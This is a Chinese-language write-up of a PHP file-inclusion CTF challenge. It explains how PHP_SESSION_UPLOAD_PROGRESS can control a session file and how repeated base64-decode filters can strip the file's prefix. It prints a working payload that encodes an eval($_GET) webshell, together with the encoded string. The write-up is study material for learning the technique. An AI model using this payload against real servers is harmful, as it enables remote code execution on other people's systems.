参考文献:https://www.anquanke.com/post/id/162656
http://wonderkun.cc/index.html/?p=718
环境
1 | ubuntu 18.04 |
PS:lsb_release -a
//查看ubuntu的发行版本
题目
1 | <?php |
PS:通过 get 方式传入一个 orange 参数,作为文件名,然后程序会将我们传入文件名的那个文件取出头6个字符和 @<?php 比对,如果配对成功那么就会包含这个文件,否则就什么都不做
解题思路:
- 通过
PHP_SESSION_UPLOAD_PROGRESS
控制session 文件
php7.2的session文件存储路径是固定的/var/lib/php/sessions/sess_{php_session_id}
文件的开头必须是
@<?php
,sess
文件中的内容1
upload_progress_K0rz3n|a:5:{s:10:"start_time";i:1540314711;s:14:"content_length";i:764161;s:15:"bytes_processed";i:5302;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"submit";s:4:"name";s:7:"tmp.gif";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1540314711;s:15:"bytes_processed";i:5302;}}}
这个文件是以
upload_progress
开头的,不能直接包含,需要控制这个开头。
convert.base64-decode
Base64的索引表由64个ASCII字符组成:0-9,26个英文小写字母a-z,26个英文大写字母:A-Z,除此之外还有额外两个字符"+"和"/"
。遇到不符合 base64 规定字符的就会将其忽略
string.strip_tags
从字符串中去除 HTML 和 PHP 标记
最终payload
upload_progress_
是16个字符,但是根据 b64 的 decode 规则,其中只有14个字符能解析,但是 14个字符又不是 4 的整数倍,于是我们必须添加两个字符,将其变成16位。必须要保证在加了这个字符以后每次 b64 可解码的位数都是4 的整数倍,要不然就会吞掉我们的 payload。1
2
3echo "upload_progress_ZZ".base64_encode(base64_encode(base64_encode('@<?php eval($_GET[1]);')));
得到:
upload_progress_ZZVVVSM0wyTkhhSGRKUjFZeVdWZDNiMHBHT1VoU1ZsSmlUVll3Y0U5M1BUMD0=
- 三次解码:
- 查看源码
Orange大佬的 exp
1 | import sys |